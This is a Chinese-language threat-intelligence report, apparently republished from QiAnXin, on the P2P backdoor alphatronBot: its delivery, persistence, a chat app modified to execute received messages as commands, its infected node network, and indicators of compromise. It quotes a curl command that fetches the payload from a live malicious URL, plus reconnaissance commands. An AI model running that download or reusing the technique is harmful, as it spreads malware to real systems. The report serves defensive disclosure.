去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

admin 2024年11月28日19:54:37评论9 views字数 2280阅读7分36秒阅读模式

概述

奇安信威胁情报中心在最近的日常运营过程中观察到一款基于 P2P 协议的后门程序,通过 PubSub 聊天室的形式进行控制,后门内置了 700 多个受感染的 P2P C2节点,影响 linux 和 windows 双平台,国内大量政企中招,我们将其命名为 alphatronBot,拥有远控功能,并且会下发特定的 payload,经过溯源发现 alphatronBot 最早出现于 2023 年初,在 2024 年 4 月份初进行重构,目前已经观察到受感染的 P2P 节点被当作网络代理进行爆破活动。

我们建议政企客户在办公区和服务器区同时部署天擎EDR,最新版本的病毒库已经支持对新老版本 alphatronBot 的查杀。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

alphatronBot

2024 年的 alphatronBot 一般作为第二阶段的载荷被攻击者通过 curl 命令远程下发,我们推测 alphatronBot 可能加入了 MAAS 分发机制,利用通用攻击面进行传播:

Cmd命令

curl -k -o  "***AppDataLocalTempNetFramework.4.8.7z" -L -C -  "https://z.yaridata.com/v/NetFramework.4.8.7z" --user-agent "****"  --retry 3

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

Wtime.cmd 被添加为持久化,负责启动加载器 wuf.exe。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

Wuf.exe 的逻辑如下,启动名为 Windows Driver Foundation (WDF).exe 的 alphatronBot 后门程序。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

2024 年重构后的 alphatronBot 由开源项目 manishmeganathan/peerchat 修改而来,通过 libp2p 实现的聊天室程序。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

攻击者在此基础上进行了修改:

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

启动时会检测自身是否在 C:UsersAdministratorAppDataLocalGoogleChromeUser Data 目录下,并且该目录下是否存在 r01.txt

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

将自己注册为 P2P 的节点,并将节点配置信息储存在同目录下的 zk.txt 和 zi.txt 中。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

攻击者内置了 700 多个 P2P 节点。格式如下:

/ip4/受感染的p2p节点/tcp/48888/p2p/Peer  ID

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot
去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

该项目节点间的通信由 PubSub 方式实现,所有节点连接到一个共同的 Topic(roomname),由该 Topic 的发送者来实现消息分发,项目中内置的默认 Topic 如下:

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

攻击者修改了 Topic 前缀为 at001,并替换了 roomname。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

连接到 Topic 后将 username 设置为 Alpha。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

最后修改了该项目的 UI 逻辑,将接收到消息后的打印函数 display.chatmessage 改为执行 CMD 命令从而实现远控功能

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

修改后的 display.chatmessage 会将接收到的消息写入 temp 文件夹下的 zc01.cmd。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

最后通过 cmd 执行 zc01.cmd。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

溯源分析

基于终端数据,我们找到了 2023 年版本的 alphatronBot(d038f50779fc1ae97db5b40289a38d64),由 Qt 库编写,功能与 2024 年的类似,从 VT 的上传数据可以推测 alphatronBot 的影响范围遍及全球。
去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

后门连接到 P2P 分布式网络后会接收如下命令进行探测和检查。

Cmd命令

tasklist

WMIC  DISKDRIVE GET SERIALNUMBER

攻击者可以在下发的 cmd 中对本地储存的 Peer ID 进行判断从而实现对不同目标下发定制化的 payload。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

影响情况

受感染的P2P网络

后门内置的 700 余个 p2p 网络由 80 个国家和地区受感染的网络设备组件组成:

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

节点涉及 MikroTik 路由器、Hikvision 摄像头、VPS 服务器、DLink 路由器、CPE 设备等,由于 alphatronBot 会将自身终端注册成 P2P 节点,所以该 P2P 网络的规模要远比目前观察的规模大,基于奇安信全球僵尸网络检测系统观测到部分 P2P 节点对应的 IP开始被当作代理对 Fortinet SSVPN 进行爆破活动。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

国内影响范围

我们统计了国内的影响情况,从 2023 年中出现一直持续至今。

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

受害者单位所属行业占比如下:

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

由于 P2P 协议的隐蔽性,攻击者可以通过任意节点下发指令,无需通过单一 C&C 服务器。这意味着即便部分节点被安全团队清理,其他节点仍可保持木马的运行。攻击者可以借助分布式更新功能,随时注入新的模块或修复漏洞,进一步增强木马的生存能力。我们建议政企客户及时更新病毒库,并全盘扫描,流量层面查询我们提供的 P2P C2 节点以保证系统的安全。

总结

目前,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等,都已经支持对此类攻击的精确检测。
去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

IOC

P2P C2网络(见GitHub 链接):

https://github.com/RedDrip7/APT_Digital_Weapon/blob/master/alphatronBot/alphatronBot_ioc.md

ITW URL:

https://z.yaridata.com/v/NetFramework.4.8.7z

MD5:

e1e9a32926ebdbcedaf693dbc43b0e4d(2024年alphatronBot)

57cc9374d78d5e9841fddfd3cc7bd609(2024年alphatronBot)

去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

点击阅读原文ALPHA 7.0

即刻助力威胁研判

原文始发于微信公众号(奇安信威胁情报中心):去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBot

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月28日19:54:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   去中心化的噩梦:隐藏在 P2P 网络下的后门 alphatronBothttps://cn-sec.com/archives/3445428.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息